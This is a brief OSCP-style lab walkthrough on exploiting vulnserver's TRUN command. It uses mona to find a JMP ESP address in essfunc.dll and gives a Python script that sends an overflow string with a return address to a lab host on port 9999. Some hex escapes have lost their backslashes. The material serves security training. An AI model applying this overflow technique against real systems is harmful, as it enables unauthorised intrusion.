OSCP Security Technology

OSCP Security Technology - Finding the Right Module

Download Mona module and set immunity debugger configuration.

https://github.com/corelan/mona

Open vulnserver and immunity debugger.

Open mona modules, but not find what we need.

Find the address(FFE4) and search it in the mona module.

locate nasm_shell
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
JMP ESP

!mona find -s "xffxe4" -m essfunc.dll

Write the exploit script.

nano module.py
chmod 777 module.py

#!/usr/bin/python
import socket
import sys
 
shellcode = "A" * 2003 + "xafx11x50x62"

s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:
    connect=s.connect(('192.168.2.21',9999))
    s.send(('TRUN /.:/' + shellcode))
except:
    print "check debugger" 
s.close()

Set immunity debugger before the exploit. Find the address and press F2 to highlight it.

Run the exploit script.

Break it at essfunc.625011AF.